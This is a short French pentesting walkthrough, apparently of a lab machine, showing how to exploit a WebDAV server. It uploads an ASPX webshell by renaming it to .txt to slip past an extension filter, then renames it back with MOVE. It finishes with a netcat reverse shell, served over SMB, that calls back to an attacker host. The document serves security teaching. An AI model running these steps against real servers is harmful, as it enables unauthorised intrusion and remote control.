webDAV - WebShell (aspx) - Pentesting Web

Le port 80 est ouvert, et le serveur supporte WebDAV. Cela nous permet potentiellement de téléverser des fichiers via la méthode PUT et de les renommer avec MOVE.

Créez un fichier de test :

echo "this is a test" > test.txt

Connectez-vous au serveur avec l’outil cadaver :

cadaver 10.10.10.15

Essayez d’uploader le fichier avec la commande PUT :

Résultat : Succès.

Upload d’une WebShell

Copiez une WebShell ASPX préexistante :

cp /usr/share/davtest/backdoors/aspx_cmd.aspx .

Essayez de l’uploader directement :

put aspx_cmd.aspx

Résultat : Échec (le serveur bloque les fichiers avec l’extension .aspx).

Changez l’extension en .txt :

mv aspx_cmd.aspx cmd.txt

Réessayez l’upload:

PUT cmd.txt

Résultat : Succès.

Renommez le fichier avec MOVE pour rétablir l’extension :

move cmd.txt cmd.aspx

Accédez à la WebShell via le navigateur :

Reverse Shell via la WebShell :

Placez un exécutable Netcat dans le répertoire courant :

cp /usr/share/SecLists/Web-Shells/FuzzDB/nc.exe .

Lancez un serveur SMB pour partager le fichier :

smbserver.py smbFolder $(pwd) -smb2support

Mettez votre machine en écoute sur le port 443 :

sudo rlwrap nc -nvlp 443

Exécutez la commande de reverse shell depuis la WebShell :

\\10.10.14.30\smbFolder\nc.exe -e cmd 10.10.14.30 443

Mis à jour il y a 1 an

hashtagUpload d’une WebShell

hashtagRenommez le fichier avec MOVE pour rétablir l’extension :

hashtagReverse Shell via la WebShell :

Upload d’une WebShell

Renommez le fichier avec MOVE pour rétablir l’extension :

Reverse Shell via la WebShell :